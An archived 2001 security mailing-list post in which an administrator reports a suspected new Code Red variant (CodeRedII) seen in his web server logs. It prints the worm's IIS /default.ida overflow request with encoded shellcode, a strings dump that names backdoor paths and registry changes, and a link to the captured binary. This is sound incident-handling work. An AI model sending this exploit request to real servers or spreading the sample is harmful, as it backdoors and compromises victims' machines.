new variant?

From: Stephen Friedl (friedlat_private)
Date: Sat Aug 04 2001 - 08:34:49 PDT

Next message: Sven Carstens: "New variant of Code Red?"

Previous message: Wayne Conrad: "CRv3?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello all,

I'm sorry if this is old news: but is there a new variant going around?
My logs just started showing entries with the signature

	/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...

instead of the 

	/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...

that we've been used to. I know there is a CRv2, but I cannot find any
references to a different signature. I've captured the entire request,
and though the % code is all the same, the payload is different. This
is the "strings" output on the binary:

----------------------------------------------------------------------
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
Content-type: text/xml
Content-length: 3379 
CodeRedII
F4)E
Th~f
Th~f
;MZu
KERNu
EL32u
GetPu
rocAu
D$$dg
LoadLibraryA
CreateThread
GetTickCount
Sleep
GetSystemDefaultLangID
GetSystemDirectoryA
CopyFileA
GlobalFindAtomA
GlobalAddAtomA
CloseHandle
_lcreat
_lwrite
_lclose
GetSystemTime
WS2_32.DLL
socket
closesocket
ioctlsocket
connect
select
send
recv
gethostname
gethostbyname
WSAGetLastError
USER32.DLL
ExitWindowsEx
\CMD.EXE
d:\inetpub\scripts\root.exe
d:\progra~1\common~1\system\MSADC\root.exe
hT @
hH @
hX @
t6Ff
%`0@
%d0@
%h0@
%p0@
%t0@
%x0@
%|0@
\EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
/Scripts
/MSADC
c:\,,217
d:\,,217
KERNEL32.dll
ADVAPI32.dll
Sleep
GetWindowsDirectoryA
WinExec
RegQueryValueExA
RegSetValueExA
RegOpenKeyExA
RegCloseKey
d:\explorer.exe
8>u'j 
----------------------------------------------------------------------

The 3818 byte capture file is on my web server if anybody wants to poke around:

	http://www.unixwiz.net/misc/codered.bin

Thanks to dwmorris at DSLReports.com for the heads up on this.

Steve

--- 
Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
www.unixwiz.net  | I speak for me only |   KA8CMY   | steveat_private

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Sven Carstens: "New variant of Code Red?"
Previous message: Wayne Conrad: "CRv3?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:45:22 PDT